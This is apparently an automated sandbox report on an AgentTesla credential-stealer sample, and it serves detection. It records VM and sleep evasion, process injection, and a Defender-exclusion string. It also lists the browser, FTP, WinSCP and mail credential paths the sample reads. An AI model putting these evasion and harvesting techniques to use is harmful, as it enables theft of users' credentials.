Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 3020 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 260 Thread sleep count: 9715 > 30
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2864 Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 3020 Thread sleep count: 96 > 30
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Last function: Thread delayed
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 104524
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Thread delayed: delay time: 103694
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Thread delayed: delay time: 104455
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Thread delayed: delay time: 30000
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: vmware
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation

Anti Debugging:

Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Memory written: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe base: 400000 value starts with: 4D5A
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Process created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
Source: vbc.exe, 00000005.00000002.2366923007.0000000000FB0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000005.00000002.2366923007.0000000000FB0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.2366923007.0000000000FB0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Queries volume information: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match File source: 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2243257481.0000000003329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 4.2.vbc.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.tnvLnx.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.tnvLnx.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.tnvLnx.exe.3473848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.tnvLnx.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.tnvLnx.exe.3473848.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.tnvLnx.exe.3553848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3553848.4.raw.unpack, type: UNPACKEDPE
Yara detected AgentTesla
Source: Yara match File source: 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2367132534.0000000002821000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2367095229.00000000027E2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2366705481.0000000002161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2243257481.0000000003329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tnvLnx.exe PID: 1664, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2908, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1980, type: MEMORY
Source: Yara match File source: Process Memory Space: tnvLnx.exe PID: 152, type: MEMORY
Source: Yara match File source: 4.2.vbc.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.tnvLnx.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.tnvLnx.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.tnvLnx.exe.3473848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.tnvLnx.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.tnvLnx.exe.3473848.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.tnvLnx.exe.3553848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3553848.4.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Tries to harvest and steal ftp login credentials
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Tries to steal Mail credentials (via file access)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Yara detected Credential Stealer
Source: Yara match File source: 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2366705481.0000000002161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1980, type: MEMORY
Source: Yara match File source: Process Memory Space: tnvLnx.exe PID: 152, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match File source: 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2243257481.0000000003329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 4.2.vbc.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.tnvLnx.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.tnvLnx.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.tnvLnx.exe.3473848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.tnvLnx.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.tnvLnx.exe.3473848.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.tnvLnx.exe.3553848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3553848.4.raw.unpack, type: UNPACKEDPE
Yara detected AgentTesla
Source: Yara match File source: 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2367132534.0000000002821000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2367095229.00000000027E2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2366705481.0000000002161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2243257481.0000000003329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tnvLnx.exe PID: 1664, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2908, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1980, type: MEMORY
Source: Yara match File source: Process Memory Space: tnvLnx.exe PID: 152, type: MEMORY
Source: Yara match File source: 4.2.vbc.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.tnvLnx.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.tnvLnx.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.tnvLnx.exe.3473848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.tnvLnx.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.tnvLnx.exe.3473848.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.tnvLnx.exe.3553848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3553848.4.raw.unpack, type: UNPACKEDPE